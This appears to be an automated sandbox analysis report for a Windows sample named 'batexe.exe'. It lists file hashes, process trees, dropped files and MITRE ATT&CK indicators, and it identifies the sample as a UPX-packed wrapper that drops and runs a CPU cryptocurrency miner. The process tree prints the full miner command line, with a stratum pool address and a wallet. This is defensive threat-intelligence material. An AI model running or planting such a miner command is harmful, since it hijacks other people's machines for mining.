73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
306s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
22/02/2024, 14:55

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2984	b2e.exe
2244	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2244	cpuminer-sse2.exe
2244	cpuminer-sse2.exe
2244	cpuminer-sse2.exe
2244	cpuminer-sse2.exe
2244	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4816-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4816 wrote to memory of 2984	4816	batexe.exe	75
PID 4816 wrote to memory of 2984	4816	batexe.exe	75
PID 4816 wrote to memory of 2984	4816	batexe.exe	75
PID 2984 wrote to memory of 4440	2984	b2e.exe	77
PID 2984 wrote to memory of 4440	2984	b2e.exe	77
PID 2984 wrote to memory of 4440	2984	b2e.exe	77
PID 4440 wrote to memory of 2244	4440	cmd.exe	80
PID 4440 wrote to memory of 2244	4440	cmd.exe	80

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4816
- C:\Users\Admin\AppData\Local\Temp\196F.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\196F.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\196F.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2064.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4440
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2244

C:\Windows\System32\IME\SHARED\imebroker.exe
C:\Windows\System32\IME\SHARED\imebroker.exe -Embedding
1⤵
PID:1216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\196F.tmp\b2e.exe

Filesize
3.1MB

MD5
96120993939f45494a2291ac005fc474

SHA1
a3cbe6f79529aebfeeb7adf91dd6b9af72029334

SHA256
238062b41bcb8369b3812623b0835fea1db60ed979c076477c0f9e4f50fbc838

SHA512
04e8b936a4401d1f0fa77d89c125aac6d30e3d56142eb91ff8f4e89f12e5c5b27b619ba4c67996833ecb4571fdd4bef315279951a67b823f64c67ec71f121615

Download Submit
C:\Users\Admin\AppData\Local\Temp\196F.tmp\b2e.exe

Filesize
2.6MB

MD5
3558f45e2ff5599b7108f843b43391a0

SHA1
bca0a9a2f7ca2508129b3e96bb7d86fd1741fd3d

SHA256
825b10711a637d804657bc936f545f69426d33befa971ca9ad89a0d0d066f984

SHA512
a2f6fe5ac53b225916d37537fe2ccfc5cd04f1fe8525490c989085d8b440983cc300335d8929a537990986f2cf62750f567235d7b688829cd612096e8f7c9b72

Download Submit
C:\Users\Admin\AppData\Local\Temp\2064.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
109KB

MD5
7f54c185bf71d5b671c1a033d5411434

SHA1
19f7420fed79be5aa13cb5135991c286ec1dce09

SHA256
a3b1bd5c2dd295c233703af03e291c2084613538e4472422f50b5cde5521532c

SHA512
fb8f8fdd457d5d3cdbb688df859992e221092149e5995be69fe887b1dd0b9a4f8ff3fc5d1a15ff99a6856e8535d66fdeb28cbb11f45699ea6142969bf864486d

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
82KB

MD5
3f3cb02c896b1b8d924b7003a2dff9d2

SHA1
e6faf9e274067adf703077f3d8a8aa2bdf37ea28

SHA256
02b909e6f80f8720ec73ca548498c80376a8c8938487ccc18a85bb3eed5bf36e

SHA512
3c6666adccdbb9936a8b6096ddf6a72f90e884b27ccafce51e75f7cce14f9eb3f2607fc3a8f3a081562ce950081505e668a021f96f79e4e6539a66a0bf8a0396

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
111KB

MD5
9f58003d43ac1b3b184abdfd61f6bec8

SHA1
dd8261d7f7cabb5ca227b9fab69cae7005547eb0

SHA256
aa979e8adb086235520e04316225bb97472500d6fbb3848cab439795d463f6bf

SHA512
d64714bcb6b8588df2f908141be5b32ae2456d51fb481e27c8650f6f6f1bbf11545085888d0e88bed76545a786e54f6d4215c8899064a6591fc9b96aa4ecd7cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
85KB

MD5
44745138859fb014b7e22e3a7651429e

SHA1
91afd353134156a03a5eaf62279ef0b952e00c44

SHA256
c8cd2012e63962fba34af69a0fa4875d23ca7031916ae029ec2f9fb062bbb5b7

SHA512
2af662cd905d13ef0f3b6a79870d96d902c7c0af0a0e464a8d0b7f2625169898a0c3490447177d2c910821cd0ac43ee5bf3b67b4b6324f395254c16fe641c556

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
92KB

MD5
985a1984bb6e4f9101752ad080c2dc61

SHA1
5c0222ff43aa30f6e6e97a04d0a36f2f1107e95f

SHA256
336faf2b589da906b51ff84ac281b7ab2502b48f5cccc6c826bfbbd51a8dcd04

SHA512
44728c5a4ab5c2fadf8ea209bb6f543111427a4484715f6f62ac52126f9033bfebf995a17552c4cbfaec49ecfaeb79ce8cf083a97e2ca7ada63eeb579fe01266

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
664KB

MD5
6e2af4c348efd119225a56732942ed9f

SHA1
ba7526ea6ccda0ec32fd7ab9a583a42fdd0242c6

SHA256
12a5ea1a88aa881ff9db52a73ec3ce630055ca5fbac1075aa3185d575984aed2

SHA512
449c67c272b1bc204c45ff92a636b33bd5a9d931df6558c19f6077ad8dd13eb15549983b46143a23e2f5f610fd5841f81b828856ccfc12a9170f94212b6bc34a

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
941KB

MD5
93b066681e230cb56ed71a4fe4c70dfb

SHA1
e9fc5f104df2f2e35be28a56eb370a74626de0e3

SHA256
5f640cab626469acce78521a15e16c56b1a08118575ec865212947ae71fc2d1c

SHA512
cdd2710f96ce3a3a27698c9f5d6d0403e9bbd7ccb1f05cc14921d4bdf891795c49b8a9e7018e99afeed19516df61abfe734cc031e03d162204405aa7a51ec872

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
718KB

MD5
36398ebccf3509ea10fe6c6b656e1310

SHA1
84af6c118d922fbc774f8cb8452230d82dcf5ea8

SHA256
4469594eb8df8def9b3af591e333bccd78a59182aff301ba983e4bacf8c43d68

SHA512
a1377f67e7f81fd42d849e0d338190a15f345cee50d970557727cc2f985cadee74e8f23c7de090f55cbac6e0618e8f9c2ea2e1582a9ed92b25ed93c2df346cda

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
14KB

MD5
57bc28e77ba7f02252d5d1c6ebeb7e33

SHA1
03d31966e052d14ff5f92d69ceacf8fc886e003c

SHA256
094b3dcb3308d87ee8c065d27dc1e0ee818c68d37312bdbc03af9c88f20914aa

SHA512
c11bdf493da9bac705cf4d31330ad4bfe2e93c5aa6c0812c47906645e441981880cd651ab20b53e0e9770053d8e3b5a7acdd515ec74f6e16a8c2cdccf49229d4

Download Submit
memory/2244-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-43-0x0000000061DB0000-0x0000000061E48000-memory.dmp

Filesize
608KB

Download
memory/2244-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2244-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2244-44-0x0000000001040000-0x00000000028F5000-memory.dmp

Filesize
24.7MB

Download
memory/2244-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2984-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2984-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4816-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download